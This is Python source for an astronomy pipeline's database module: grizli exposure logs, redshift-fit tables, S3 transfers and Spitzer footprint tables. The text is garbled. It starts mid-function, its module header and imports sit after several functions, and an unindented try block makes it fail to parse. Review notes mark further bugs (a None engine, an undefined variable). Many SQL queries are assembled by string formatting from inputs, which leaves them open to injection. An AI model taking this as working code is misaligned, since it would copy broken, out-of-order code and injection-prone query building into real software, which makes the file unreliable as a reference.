        fps = [np.array(fp.convex_hull.boundary.xy)[:, :-1].tolist() for fp in v['footprints']]
        df = pd.DataFrame()
        df['file'] = [f.split('_')[0] for f in v['files']]
        df['dataset'] = [f.split('_')[0][:-1] for f in v['files']]
        df['extension'] = [f.split('_')[1][:3] for f in v['files']]
        df['filter'] = v['filter']
        df['parent'] = v['parent']
        df['awspath'] = v['awspath']
        df['product'] = v['product']
        df['filter'] = v['product'].split('-')[-1]

        df['ra'] = [fp.centroid.xy[0][0] for fp in v['footprints']]
        df['dec'] = [fp.centroid.xy[1][0] for fp in v['footprints']]
        df['area'] = [fp.area*np.cos(df['dec'][i]/180*np.pi)*3600 for i, fp in enumerate(v['footprints'])]
        df['footprint'] = fps

        # NOTE(review): DataFrame.append was removed in pandas 2.0;
        # pd.concat would be needed on newer pandas
        if df0 is None:
            df0 = df
        else:
            df0 = df0.append(df)

        if len(df0) > SKIP:
            # Send to DB and reset append table
            print('>>> to DB >>> ({0}, {1})'.format(i, len(df0)))
            df0.to_sql('exposure_log', engine, index=False, if_exists='append', method='multi')
            df0 = df[:0]
def update_all_exposure_log():
    """
    Run `update_exposure_log` for every `exposure_log` row still missing
    header metadata.

    One-off maintenance script run interactively: the *last* `_files`
    assignment is the active query; the earlier (and commented) queries are
    kept as a record of previous passes.
    """
    import glob
    import numpy as np
    from grizli.aws import db
    from importlib import reload
    reload(db)

    config = db.get_connection_info(config_file='/home/ec2-user/db_readonly.yml')
    engine = db.get_db_engine(config=config)

    # DASH
    #_files = db.from_sql("SELECT file from exposure_log WHERE mdrizsky is null AND file like 'icxe%%'", engine)

    # COSMOS F160W
    _files = db.from_sql("SELECT file, filter, awspath from exposure_log WHERE mdrizsky is null AND awspath like 'grizli-cosmos%%' AND filter like 'f160w'", engine)

    # COSMOS F814W
    #_files = db.from_sql("SELECT file, filter, awspath from exposure_log WHERE mdrizsky is null AND ABS(ra-150.1) < 0.6 AND ABS(dec-2.2) < 0.6 AND filter like 'f814w'", engine)
    #_files = db.from_sql("SELECT file, filter, awspath from exposure_log WHERE mdrizsky is null AND ABS(ra-150.1) < 0.6 AND ABS(dec-2.2) < 0.6", engine)

    ### COSMOS grism
    #_files = db.from_sql("SELECT file, filter, awspath from exposure_log WHERE mdrizsky is null AND ABS(ra-150.1) < 0.6 AND ABS(dec-2.2) < 0.6 AND filter like 'g1%%'", engine)

    ### All grism
    #_files = db.from_sql("SELECT file, filter, awspath, mdrizsky from exposure_log WHERE mdrizsky is null AND filter like 'g1%%'", engine)
    #db.update_exposure_log({'file':_files['file'][0], 'engine':engine, 'skip':False}, {})

    # All IR
    # _files = db.from_sql("SELECT file, filter from exposure_log WHERE mdrizsky is null AND filter like 'f0%%'", engine)

    #
    _files = db.from_sql("SELECT file, filter, parent from exposure_log WHERE mdrizsky is null AND filter like 'f%%'", engine)
    _files = db.from_sql("SELECT file, filter, parent, product from exposure_log WHERE mdrizsky is null AND gsky101 is null", engine)

    # Skip 3DHST
    keep = _files['parent'] != 'xx'
    for p in ['j123656p6215','j141952p5255','j033236m2748','j021740m0512']:
        keep &= _files['parent'] != p

    #_files = db.from_sql("SELECT file, filter from exposure_log WHERE mdrizsky is null AND awspath like 'grizli-cosmos%%' AND filter like 'f814w' LIMIT 10", engine)

    # latest cosmos
    _files = db.from_sql("SELECT file, filter, awspath from exposure_log WHERE mdrizsky is null AND awspath like 'cosmos-dash%%' AND filter like 'f160w'", engine)

    N = len(_files)
    # Randomize the processing order so parallel runs don't collide
    idx = np.argsort(np.random.normal(size=N))

    for i, file in enumerate(_files['file'][idx]):
        print(f'\n {i+1} / {N}\n')
        _ = glob.glob(f'{file}*')
        # Only process files that don't already have a local copy
        if len(_) == 0:
            db.update_exposure_log({'file':file, 'engine':engine}, {})
def update_exposure_log(event, context):
    """
    Get exposure info from FITS file and put in database

    Recognized `event` keywords (default):

        'file' : file rootname in exposure_log, *required*
        'keywords' : list of keywords to take from the Primary header
                     (['EXPFLAG','EXPTIME','EXPSTART','SUNANGLE'])
        'dump_dq' : generate a compact DQ file and upload to S3 (True)
        'remove': Remove the downloaded exposure file (True)
        'skip': Don't do anything if 'mdrizsky' populated in database

    Returns False on failure, True if skipped, or the dict of updated
    column values on success.  `context` is unused (lambda signature).
    """
    import os
    import boto3
    import astropy.io.fits as pyfits
    from grizli import utils

    if 'file' not in event:
        print("'file' keyword not found in `event`")
        return False

    if 'keywords' in event:
        keywords = event['keywords']
    else:
        keywords = ['EXPFLAG','EXPTIME','EXPSTART','SUNANGLE']

    # Always also pull the background-sky and persistence keywords
    keywords += ['GSKY101', 'GSKY102', 'GSKY103', 'PERSNPIX', 'PERSLEVL']

    kwvals = {}

    if 'engine' in event:
        engine = event['engine']
    else:
        engine = get_db_engine(echo=False)

    _q = from_sql("SELECT * from exposure_log where file LIKE '{0}'".format(event['file']), engine)

    if len(_q) == 0:
        print('File {0} not found in `exposure_log`'.format(event['file']))
        return False

    if 'skip' in event:
        skip = event['skip']
    else:
        skip = True

    # An unmasked `mdrizsky` column means this row was already populated
    if (not hasattr(_q['mdrizsky'], 'mask')) & skip:
        print('Info for {0} found in `exposure_log`'.format(event['file']))
        return True

    #
    local_file = '{0}_{1}.fits'.format(_q['file'][0], _q['extension'][0])

    s3 = boto3.resource('s3')
    bucket = _q['awspath'][0].split('/')[0]
    bkt = s3.Bucket(bucket)
    awsfile = '/'.join(_q['awspath'][0].split('/')[1:]).strip('/')
    awsfile += '/'+local_file

    print(f'{bucket}:{awsfile} > {local_file}')

    if not os.path.exists(local_file):
        try:
            bkt.download_file(awsfile, local_file,
                              ExtraArgs={"RequestPayer": "requester"})
        except:
            print(f'Failed to download s3://{bucket}/{awsfile}')

            # Try other bucket path
            if 'Exposures' in awsfile:
                bucket = 'grizli-v1'
                bkt = s3.Bucket(bucket)
                awsfile = 'Pipeline/{0}/Prep/'.format(_q['parent'][0])
                awsfile += local_file
                try:
                    bkt.download_file(awsfile, local_file,
                                      ExtraArgs={"RequestPayer": "requester"})
                except:
                    print(f'Failed to download s3://{bucket}/{awsfile}')
                    return False

                # Record the path that actually worked for the DB update
                kwvals['awspath'] = f'{bucket}/{os.path.dirname(awsfile)}'
            else:
                return False

    ######### Update exposure_log table
    im = pyfits.open(local_file)
    # Count of unflagged pixels in the DQ extension
    kwvals['ndq'] = (im['DQ',1].data == 0).sum()

    if 'MDRIZSKY' in im['SCI',1].header:
        kwvals['mdrizsky'] = im['SCI',1].header['MDRIZSKY']

    # Copy requested primary-header keywords that have matching DB columns
    for k in keywords:
        if (k in im[0].header) & (k.lower() in _q.colnames):
            kwvals[k.lower()] = im[0].header[k]

    # Build "col = value" SET clauses, quoting string values
    set_keys = []
    for k in kwvals:
        if isinstance(kwvals[k], str):
            _set = 'x = \'{x}\''
        else:
            _set = 'x = {x}'

        set_keys.append(_set.replace('x', k))

    sqlstr = ('UPDATE exposure_log SET ' + ', '.join(set_keys) +
              " WHERE file LIKE '{0}'".format(event['file']))

    print(sqlstr.format(**kwvals))
    engine.execute(sqlstr.format(**kwvals))

    im.close()

    ######### Compact DQ file
    if 'dump_dq' in event:
        dump_dq = event['dump_dq']
    else:
        dump_dq = True

    if dump_dq:
        utils.dump_flt_dq(local_file)
        repl = ('.fits', '.dq.fits.gz')
        print(f'{local_file} > {bucket}:{awsfile}'.replace(*repl))
        try:
            bkt.upload_file(local_file.replace(*repl),
                            awsfile.replace(*repl),
                            ExtraArgs={'ACL':'public-read'})
        except:
            print(f'Failed to upload s3://{bucket}:{awsfile}'.replace(*repl))

    # Clean up the local copies
    remove = True
    if 'remove' in event:
        remove = event['remove']

    if remove:
        print('Remove '+local_file)
        if os.path.exists(local_file):
            os.remove(local_file)

        if dump_dq:
            print('Remove '+local_file.replace(*repl))
            if os.path.exists(local_file.replace(*repl)):
                os.remove(local_file.replace(*repl))

    return kwvals
def run_shrink_ramps():
    """
    Batch driver for `shrink_ramp_file`: query a few 'flt' rows from
    `exposure_log` and compress their ramp.png thumbnails.

    Fix: the original referenced the bare name `engine`, which resolves to
    the module-level placeholder ``engine = None`` and would fail on the
    first query — create a live engine locally instead.
    """
    from grizli.aws import db

    # Module-level `engine` is None at import time; build a real one here
    engine = db.get_db_engine(echo=False)

    _q = db.from_sql("select file, awspath, parent from exposure_log where extension LIKE 'flt' AND parent LIKE 'j002836m3311' limit 5", engine)

    for i, (file, awspath, parent) in enumerate(zip(_q['file'], _q['awspath'], _q['parent'])):
        shrink_ramp_file(file, awspath, parent, engine=engine, MAX_SIZE=2*1024**2, convert_args='-scale 35% -quality 90', remove=True)
def shrink_ramp_file(file, awspath, parent, engine=None, MAX_SIZE=2*1024**2, convert_args='-scale 35% -quality 90', remove=True):
    """
    Make ramp.png files smaller with ImageMagick

    Downloads `{file}_ramp.png` from S3 and, if it is larger than
    `MAX_SIZE` bytes, runs `convert` with `convert_args` and uploads the
    shrunken image back to the same key.  Returns False if the download
    fails; local files are removed when `remove` is True.
    """
    import os
    import subprocess
    import shutil

    import boto3
    import astropy.io.fits as pyfits

    from grizli import utils

    if engine is None:
        engine = get_db_engine(echo=False)

    local_file = '{0}_ramp.png'.format(file)

    s3 = boto3.resource('s3')
    bucket = awspath.split('/')[0]
    bkt = s3.Bucket(bucket)
    awsfile = '/'.join(awspath.split('/')[1:])
    awsfile += '/'+local_file
    # ramp files live in RAW/, not Prep/
    awsfile = awsfile.replace('/Prep','/RAW')

    print(f'{bucket}/{awsfile} > {local_file}')

    if not os.path.exists(local_file):
        try:
            bkt.download_file(awsfile, local_file,
                              ExtraArgs={"RequestPayer": "requester"})
        except:
            print(f'Failed to download s3://{bucket}/{awsfile}')

            # Try other bucket path
            if 'Exposures' in awsfile:
                bucket = 'grizli-v1'
                bkt = s3.Bucket(bucket)
                awsfile = 'Pipeline/{0}/RAW/'.format(parent)
                awsfile += local_file
                try:
                    bkt.download_file(awsfile, local_file,
                                      ExtraArgs={"RequestPayer": "requester"})
                except:
                    print(f'Failed to download s3://{bucket}/{awsfile}')
                    return False
            else:
                return False

    print(f'{local_file:>25} {os.stat(local_file).st_size/1024**2:.2f}')

    bw_file = local_file.replace('.png', '.sm.png')
    if os.stat(local_file).st_size > MAX_SIZE:
        # External ImageMagick call; convert_args controls scale/quality
        subprocess.call(f"convert {convert_args} {local_file} {bw_file}",
                        shell=True)

        print(f'{bw_file:>25} {os.stat(bw_file).st_size/1024**2:.2f}')
        try:
            bkt.upload_file(bw_file, awsfile, ExtraArgs={'ACL':'public-read'})
        except:
            print(f'Failed to upload s3://{bucket}/{awsfile}')
    else:
        print('skip')

    if remove:
        print('Remove '+local_file)
        if os.path.exists(local_file):
            os.remove(local_file)

        if os.path.exists(bw_file):
            os.remove(bw_file)
def get_exposures_at_position(ra, dec, engine, dr=10):
    """
    Query `exposure_log` rows within a rectangular box around (ra, dec).

    `dr` is the box half-width in degrees; the RA half-width is stretched
    by 1/cos(dec) to keep the box roughly square on the sky.
    """
    cosdec = np.cos(dec/180*np.pi)
    dra = dr/cosdec

    query = ('select * from exposure_log where '
             '(ABS(ra - {0}) < {1}) AND (ABS(dec-{2}) < {3})')

    return from_sql(query.format(ra, dra, dec, dr), engine)
def add_irac_table():
    """
    Build the `spitzer_aors` and `spitzer_log` tables from per-field IPAC
    query catalogs (run interactively; working directory is hard-coded).
    """
    from scipy.spatial import ConvexHull

    os.chdir('/Users/gbrammer/Research/HST/CHArGE/FieldsSummary')
    files = glob.glob('*ipac.fits')
    files.sort()

    # Map short column keys (e.g. 'irac36') to the catalog band labels
    bands = ['IRAC 3.6um', 'IRAC 4.5um', 'IRAC 5.8um', 'IRAC 8.0um', 'MIPS 24um']
    bkey = {}
    for b in bands:
        key = b.replace(' ', '').replace('.', '')[:-2].lower()
        bkey[key] = b

    N = 0
    data = {'field_root': []}
    aor_data = {'field_root': [], 'reqkey': []}
    for k in bkey:
        data['exp_'+k] = []
        data['n_'+k] = []
        data['fp_'+k] = []

    for i, file in enumerate(files):
        tab = utils.read_catalog(file)
        field = file.split('_ipac')[0]

        # Placeholder catalogs (with an 'x' column) get all-zero entries
        if 'x' in tab.colnames:
            data['field_root'].append(field)
            for k in bkey:
                data['exp_'+k].append(0)
                data['n_'+k].append(0)
                data['fp_'+k].append([])

            continue

        N += len(tab)
        print(i, file, N)

        data['field_root'].append(field)
        for k in bkey:
            # Exposures of this band that overlap HST coverage
            sel = tab['with_hst'] & (tab['wavelength'] == bkey[k])
            data['exp_'+k].append(tab['exposuretime'][sel].sum()/3600)
            data['n_'+k].append(sel.sum())
            if sel.sum() == 0:
                data['fp_'+k].append([])
                continue

            # Convex hull of the four AOR corner coordinates = footprint
            r, d = [], []
            for j in range(4):
                r.extend(tab['ra{0}'.format(j+1)][sel].data)
                d.extend(tab['dec{0}'.format(j+1)][sel].data)

            pts = np.array([r, d]).T
            vert = ConvexHull(pts).vertices
            fp = pts[vert, :]
            data['fp_'+k].append(fp.T.tolist())

        aors = np.unique(tab['reqkey'])
        aor_data['field_root'].extend([field]*len(aors))
        aor_data['reqkey'].extend(list(aors))

    #
    import pandas as pd
    df = pd.DataFrame(aor_data)
    # NOTE(review): relies on module-level `engine`, which is None at import
    df.to_sql('spitzer_aors', engine, index=False, if_exists='append', method='multi')

    df = pd.DataFrame(data)

    # First row to initialize table
    first = df[0:1]
    for k in bkey:
        first.pop('fp_'+k)

    engine.execute('drop table spitzer_log;')
    first.to_sql('spitzer_log', engine, index=False, if_exists='append', method='multi')

    # Add array-valued footprint columns, then reload the full table
    for k in bkey:
        cmd = 'alter table spitzer_log add column fp_{0} float [];'.format(k)
        engine.execute(cmd)

    engine.execute('delete from spitzer_log where True;')
    df.to_sql('spitzer_log', engine, index=False, if_exists='append', method='multi')
def show_all_fields():
    """
    Regenerate the summary HTML tables / redshift histograms for every root
    in `redshift_fit` and copy the zhist PNGs to the public tables area.
    """
    from grizli.aws import db as grizli_db
    import matplotlib.pyplot as plt
    plt.ioff()

    # NOTE(review): relies on module-level `engine`, which is None at import
    res = pd.read_sql_query("select distinct root from redshift_fit order by root;", engine)
    roots = res['root'].tolist()

    for root in roots:
        print('\n\n', root, '\n\n')
        # Skip roots whose histogram already exists locally
        if os.path.exists('{0}_zhist.png'.format(root)):
            continue

        try:
            res = grizli_db.make_html_table(engine=engine, columns=['mtime', 'root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 't_g102', 't_g141', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'zwidth1/(1+z_map) as zw1', 'dlinesn', 'q_z'], where="AND status > 4 AND root = '{0}'".format(root), table_root=root, sync='s3://grizli-v1/Pipeline/{0}/Extractions/'.format(root), png_ext=['R30', 'stack', 'full', 'line'], show_hist=True)
        except:
            continue

        os.system('aws s3 cp s3://grizli-v1/Pipeline/{0}/Extractions/{0}_zhist.png s3://grizli-v1/tables/'.format(root))
# use user path
"""
Interact with the grizli AWS database
"""
import os
import glob
import numpy as np
try:
import pandas as pd
except:
pd = None
from .. import utils
# Integer progress flags stored in the `status` column of `redshift_fit`
FLAGS = {'init_lambda': 1,
         'start_beams': 2,
         'done_beams': 3,
         'no_run_fit': 4,
         'start_redshift_fit': 5,
         'fit_complete': 6}

# Columns accepted by the `redshift_fit` table (used by `get_row_data` to
# filter row files before upload)
COLUMNS = ['root', 'id', 'status', 'ra', 'dec', 'ninput', 'redshift', 'as_epsf', 't_g102', 'n_g102', 'p_g102', 't_g141', 'n_g141', 'p_g141', 't_g800l', 'n_g800l', 'p_g800l', 'numlines', 'haslines', 'chi2poly', 'chi2spl', 'splf01', 'sple01', 'splf02', 'sple02', 'splf03', 'sple03', 'splf04', 'sple04', 'huberdel', 'st_df', 'st_loc', 'st_scl', 'dof', 'chimin', 'chimax', 'bic_poly', 'bic_spl', 'bic_temp', 'z02', 'z16', 'z50', 'z84', 'z97', 'zwidth1', 'zwidth2', 'z_map', 'zrmin', 'zrmax', 'z_risk', 'min_risk', 'd4000', 'd4000_e', 'dn4000', 'dn4000_e', 'dlineid', 'dlinesn', 'flux_pab', 'err_pab', 'ew50_pab', 'ewhw_pab', 'flux_hei_1083', 'err_hei_1083', 'ew50_hei_1083', 'ewhw_hei_1083', 'flux_siii', 'err_siii', 'ew50_siii', 'ewhw_siii', 'flux_oii_7325', 'err_oii_7325', 'ew50_oii_7325', 'ewhw_oii_7325', 'flux_ariii_7138', 'err_ariii_7138', 'ew50_ariii_7138', 'ewhw_ariii_7138', 'flux_sii', 'err_sii', 'ew50_sii', 'ewhw_sii', 'flux_ha', 'err_ha', 'ew50_ha', 'ewhw_ha', 'flux_oi_6302', 'err_oi_6302', 'ew50_oi_6302', 'ewhw_oi_6302', 'flux_hei_5877', 'err_hei_5877', 'ew50_hei_5877', 'ewhw_hei_5877', 'flux_oiii', 'err_oiii', 'ew50_oiii', 'ewhw_oiii', 'flux_hb', 'err_hb', 'ew50_hb', 'ewhw_hb', 'flux_oiii_4363', 'err_oiii_4363', 'ew50_oiii_4363', 'ewhw_oiii_4363', 'flux_hg', 'err_hg', 'ew50_hg', 'ewhw_hg', 'flux_hd', 'err_hd', 'ew50_hd', 'ewhw_hd', 'flux_h7', 'err_h7', 'ew50_h7', 'ewhw_h7', 'flux_h8', 'err_h8', 'ew50_h8', 'ewhw_h8', 'flux_h9', 'err_h9', 'ew50_h9', 'ewhw_h9', 'flux_h10', 'err_h10', 'ew50_h10', 'ewhw_h10', 'flux_neiii_3867', 'err_neiii_3867', 'ew50_neiii_3867', 'ewhw_neiii_3867', 'flux_oii', 'err_oii', 'ew50_oii', 'ewhw_oii', 'flux_nevi_3426', 'err_nevi_3426', 'ew50_nevi_3426', 'ewhw_nevi_3426', 'flux_nev_3346', 'err_nev_3346', 'ew50_nev_3346', 'ewhw_nev_3346', 'flux_mgii', 'err_mgii', 'ew50_mgii', 'ewhw_mgii', 'flux_civ_1549', 'err_civ_1549', 'ew50_civ_1549', 'ewhw_civ_1549', 'flux_ciii_1908', 'err_ciii_1908', 'ew50_ciii_1908', 'ewhw_ciii_1908', 'flux_oiii_1663', 
'err_oiii_1663', 'ew50_oiii_1663', 'ewhw_oiii_1663', 'flux_heii_1640', 'err_heii_1640', 'ew50_heii_1640', 'ewhw_heii_1640', 'flux_niii_1750', 'err_niii_1750', 'ew50_niii_1750', 'ewhw_niii_1750', 'flux_niv_1487', 'err_niv_1487', 'ew50_niv_1487', 'ewhw_niv_1487', 'flux_nv_1240', 'err_nv_1240', 'ew50_nv_1240', 'ewhw_nv_1240', 'flux_lya', 'err_lya', 'ew50_lya', 'ewhw_lya', 'pdf_max', 'cdf_z', 'sn_pab', 'sn_hei_1083', 'sn_siii', 'sn_oii_7325', 'sn_ariii_7138', 'sn_sii', 'sn_ha', 'sn_oi_6302', 'sn_hei_5877', 'sn_oiii', 'sn_hb', 'sn_oiii_4363', 'sn_hg', 'sn_hd', 'sn_h7', 'sn_h8', 'sn_h9', 'sn_h10', 'sn_neiii_3867', 'sn_oii', 'sn_nevi_3426', 'sn_nev_3346', 'sn_mgii', 'sn_civ_1549', 'sn_ciii_1908', 'sn_oiii_1663', 'sn_heii_1640', 'sn_niii_1750', 'sn_niv_1487', 'sn_nv_1240', 'sn_lya', 'chinu', 'bic_diff', 'log_risk', 'log_pdf_max', 'zq', 'mtime', 'vel_bl', 'vel_nl', 'vel_z', 'vel_nfev', 'vel_flag', 'grizli_version']

# Module-level engine placeholder; several scratch functions reference this
# name, so it must be replaced with a live engine before they are run
engine = None
def get_connection_info(config_file=None):
    """
    Read the database connection info

    Defaults to the packaged ``../data/db.yml`` file, but a user-local
    ``~/db.local.yml`` takes precedence when it exists.
    """
    import yaml

    if config_file is None:
        config_file = os.path.join(os.path.dirname(__file__),
                                   '../data/db.yml')

    # Prefer the per-user override file; guarded because $HOME may be unset
    try:
        local_file = os.path.join(os.getenv('HOME'), 'db.local.yml')
        if os.path.exists(local_file):
            # print('Use ~/db.local.yml')
            config_file = local_file
    except:
        pass

    with open(config_file) as fp:
        # Older PyYAML versions don't accept the Loader keyword
        try:
            db_info = yaml.load(fp, Loader=yaml.FullLoader)
        except:
            db_info = yaml.load(fp)

    return db_info
def get_db_engine(config=None, echo=False):
    """
    Generate an SQLAlchemy engine for the grizli database

    When the EC2 IAM credential file '/home/ec2-user/db.iam.yaml' exists,
    connect with an RDS IAM auth token; otherwise use username/password
    from `get_connection_info` (or the supplied `config` dict).
    """
    from sqlalchemy import create_engine
    import sqlalchemy.pool as pool
    import psycopg2
    import boto3

    # With IAM auth on EC2
    iam_file = '/home/ec2-user/db.iam.yaml'
    if os.path.exists(iam_file):
        config = get_connection_info(config_file=iam_file)

        session = boto3.Session()
        client = session.client('rds', region_name=config['region'])
        # Short-lived RDS auth token used in place of a password
        token = client.generate_db_auth_token(DBHostname=config['hostname'],
                                              Port=config['port'],
                                              DBUsername=config['username'],
                                              Region=config['region'])

        # conn = psycopg2.connect(host=config['hostname'],
        #                         port=config['port'],
        #                         database=config['database'],
        #                         user=config['username'],
        #                         password=token,
        #                         sslrootcert="SSLCERTIFICATE")
        #
        # engine = create_engine('postgresql+psycopg2://', creator=POOL.getconn)

        connect_args = dict(host=config['hostname'],
                            port=config['port'],
                            database=config['database'],
                            user=config['username'],
                            password=token,
                            sslrootcert="SSLCERTIFICATE")

        engine = create_engine('postgresql+psycopg2://',
                               connect_args=connect_args)
        return engine

    if config is None:
        config = get_connection_info()

    db_string = "postgresql://{0}:{1}@{2}:{3}/{4}"
    db_string = db_string.format(config['username'], config['password'],
                                 config['hostname'], config['port'],
                                 config['database'])

    engine = create_engine(db_string, echo=echo)
    return engine
def get_redshift_fit_status(root, id, table='redshift_fit', engine=None):
    """
    Get status value from the database for root_id object

    Returns -1 when no matching row exists.
    """
    import pandas as pd

    if engine is None:
        engine = get_db_engine(echo=False)

    query = "SELECT status FROM {2} WHERE (root = '{0}' AND id = {1})"
    res = pd.read_sql_query(query.format(root, id, table), engine)

    if len(res) > 0:
        return res['status'][0]

    # Object not found in the table
    return -1
def update_jname():
    """
    Scratch: generate J-name target strings for all photometry sources and
    flag duplicated objects in `redshift_fit` with a KD-tree match.
    """
    from grizli import utils
    from grizli.aws import db as grizli_db

    # NOTE(review): relies on module-level `engine`, which is None at import
    res = grizli_db.from_sql("select p_root, p_id, p_ra, p_dec from photometry_apcorr", engine)

    jn = [utils.radec_to_targname(ra=ra, dec=dec, round_arcsec=(0.001, 0.001), precision=2, targstr='j{rah}{ram}{ras}.{rass}{sign}{ded}{dem}{des}.{dess}') for ra, dec in zip(res['p_ra'], res['p_dec'])]

    for c in res.colnames:
        res.rename_column(c, c.replace('p_', 'j_'))

    zres = grizli_db.from_sql("select root, phot_root, id, ra, dec, z_map,"
                              "q_z, t_g800l, t_g102, t_g141, status from "
                              "redshift_fit where ra is not null and "
                              "status > 5", engine)

    # Find duplicates
    from scipy.spatial import cKDTree

    data = np.array([zres['ra'], zres['dec']]).T

    # Keep fits with acceptable redshift quality
    ok = zres['q_z'].filled(-100) > -0.7

    tree = cKDTree(data[ok])
    # Nearest neighbor of each point (k=2 since the closest match is itself)
    dr, ix = tree.query(data[ok], k=2)

    cosd = np.cos(data[:, 1]/180*np.pi)
    dup = (dr[:, 1] < 0.01/3600)  # & (zres['phot_root'][ix[:,0]] != zres['phot_root'][ix[:,1]])

    ix0 = ix[:, 0]
    ix1 = ix[:, 1]

    # Duplicate: same phot_root/id pair within 0.01 arcsec
    dup = (dr[:, 1] < 0.01/3600)
    dup &= (zres['phot_root'][ok][ix0] == zres['phot_root'][ok][ix1])
    dup &= (zres['id'][ok][ix0] == zres['id'][ok][ix1])

    # second is G800L
    dup &= zres['t_g800l'].filled(0)[ok][ix1] > 10

    # plt.scatter(zres['z_map'][ok][ix0[dup]], zres['z_map'][ok][ix1[dup]],
    #             marker='.', alpha=0.1)
def update_redshift_fit_status(root, id, status=0, table='redshift_fit', engine=None, verbose=True):
    """
    Set the status flag in the table

    If no row exists for (root, id), insert a stub row with just
    root/id/status/mtime; otherwise UPDATE the existing row in place.

    Fix: the UPDATE branch previously duplicated the engine-vs-connection
    dispatch inline; it now calls the shared `execute_helper`.
    """
    import time
    import pandas as pd
    from astropy.table import Table
    from astropy.time import Time

    NOW = Time.now().iso

    if engine is None:
        engine = get_db_engine(echo=False)

    old_status = get_redshift_fit_status(root, id, table=table, engine=engine)
    if old_status < 0:
        # Need to add an empty row
        tab = Table()
        tab['root'] = [root]
        tab['id'] = [id]
        tab['status'] = [status]
        tab['mtime'] = [NOW]

        row_df = tab.to_pandas()

        add_redshift_fit_row(row_df, engine=engine, table=table,
                             verbose=verbose)
    else:
        sqlstr = """UPDATE {0}
            SET status = {1}, mtime = '{2}'
            WHERE (root = '{3}' AND id = {4});
            """.format(table, status, NOW, root, id)

        if verbose:
            msg = 'Update status for {0} {1}: {2} -> {3} on `{4}` ({5})'
            print(msg.format(root, id, old_status, status, table, NOW))

        # Handles both psycopg2 connections and sqlalchemy engines
        execute_helper(sqlstr, engine)
def execute_helper(sqlstr, engine):
    """
    Different behaviour for psycopg2.connection and sqlalchemy.engine
    """
    # psycopg2 connections expose `cursor`; sqlalchemy engines run directly
    if not hasattr(engine, 'cursor'):
        engine.execute(sqlstr)
    else:
        with engine.cursor() as cur:
            cur.execute(sqlstr)
def get_row_data(rowfile='gds-g800l-j033236m2748_21181.row.fits', status_flag=FLAGS['fit_complete']):
    """
    Convert table from a row file to a pandas DataFrame

    `rowfile` may be a FITS row filename, an ascii stellar-fit filename, or
    an astropy Table.  Columns not present in the database schema are
    dropped; `mtime`/`status` are stamped on every row.
    """
    import pandas as pd
    from astropy.table import Table
    from astropy.time import Time

    NOW = Time.now().iso

    if isinstance(rowfile, str):
        if rowfile.endswith('.fits'):
            tab = Table.read(rowfile, character_as_bytes=False)
            allowed_columns = COLUMNS
        else:
            # Output of stellar fits
            tab = Table.read(rowfile, format='ascii.commented_header')
            tab['chinu'] = tab['chi2']/tab['dof']
            tab['phot_root'] = tab['root']

            tab.rename_column('best_template', 'stellar_template')

            try:
                tab['chinu'] = tab['chi2']/tab['dof']
                tab['phot_root'] = tab['root']

                # BIC of spline-only and template fits
                bic_spl = np.log(tab['dof'])*(tab['nk']-1) + tab['chi2_flat']
                bic_star = np.log(tab['dof'])*(tab['nk']) + tab['chi2']
                tab['bic_diff_star'] = bic_spl - bic_star
            except:
                print('Parse {0} failed'.format(rowfile))
                pass

            allowed_columns = ['root', 'id', 'ra', 'dec', 'chi2', 'nk', 'dof',
                               'chinu', 'chi2_flat', 'bic_diff_star', 'mtime',
                               'stellar_template', 'status', 'phot_root',
                               'as_epsf']
    else:
        # NOTE(review): `allowed_columns` is never set on this path, so a
        # Table input would raise NameError below — confirm intended usage
        tab = rowfile

    # cdf_z is array-valued; pull it out and re-attach as a list column
    if 'cdf_z' in tab.colnames:
        cdf_z = tab['cdf_z'].data
        tab.remove_column('cdf_z')
    else:
        cdf_z = None

    tab['mtime'] = NOW
    tab['status'] = status_flag

    remove_cols = []
    # Normalize column names: dashes to underscores, then lowercase
    for c in tab.colnames:
        if '-' in c:
            tab.rename_column(c, c.replace('-', '_'))

    for c in tab.colnames:
        tab.rename_column(c, c.lower())

    # Remove columns not in the database
    remove_cols = []
    for c in tab.colnames:
        if c not in allowed_columns:
            #print('Remove column: ', c)
            remove_cols.append(c)

    if len(remove_cols) > 0:
        tab.remove_columns(remove_cols)

    row_df = tab.to_pandas()
    if cdf_z is not None:
        row_df['cdf_z'] = cdf_z.tolist()

    return row_df
def delete_redshift_fit_row(root, id, table='redshift_fit', engine=None):
    """
    Delete a row from the redshift fit table
    """
    if engine is None:
        engine = get_db_engine(echo=False)

    sqlstr = "DELETE from {2} WHERE (root = '{0}' AND id = {1})"
    res = engine.execute(sqlstr.format(root, id, table))
def add_redshift_fit_row(row_df, table='redshift_fit', engine=None, verbose=True):
    """
    Update the row in the redshift_fit table

    Accepts either a DataFrame or a row-file path (converted with
    `get_row_data`); replaces any existing (root, id) row.
    """
    if engine is None:
        engine = get_db_engine(echo=False)

    if isinstance(row_df, str):
        row_df = get_row_data(row_df)

    has_keys = ('root' in row_df.columns) & ('id' in row_df.columns)
    if not has_keys:
        print('Need at least "root" and "id" columns in the row data')
        return False

    root = row_df['root'][0]
    id = row_df['id'][0]

    # Delete the old row?
    status = get_redshift_fit_status(root, id, table=table, engine=engine)
    if status >= 0:
        print('Delete and update row for {0}/{1} on `{2}`'.format(root, id,
              table))
        delete_redshift_fit_row(root, id, table=table, engine=engine)
    else:
        print('Add row for {0}/{1} on `{2}`'.format(root, id, table))

    # Add the new data
    row_df.to_sql(table, engine, index=False, if_exists='append', method='multi')
###########
def add_missing_rows(root='j004404m2034', engine=None):
    """
    Add rows that were completed but that aren't in the table
    """
    import glob
    from astropy.table import vstack, Table

    import pandas as pd

    from grizli.aws import db as grizli_db

    if engine is None:
        engine = grizli_db.get_db_engine(echo=False)

    # Pull down all row files for this root from S3
    os.system('aws s3 sync s3://grizli-v1/Pipeline/{0}/Extractions/ ./ --exclude "*" --include "*row.fits"'.format(root))

    row_files = glob.glob('{0}*row.fits'.format(root))
    row_files.sort()

    # ids already marked complete (status=6) in the DB
    res = pd.read_sql_query("SELECT root, id, status FROM redshift_fit WHERE root = '{0}' AND status=6".format(root), engine)

    res_ids = res['id'].to_list()
    tabs = []

    print('\n\n NROWS={0}, NRES={1}\n\n'.format(len(row_files), len(res)))

    for row_file in row_files:
        # Object id is the zero-padded 5-digit suffix of the row filename
        id_i = int(row_file.split('.row.fits')[0][-5:])
        if id_i not in res_ids:
            grizli_db.add_redshift_fit_row(row_file, engine=engine, verbose=True)
def convert_1D_to_lists(file='j234420m4245_00615.1D.fits'):
    """
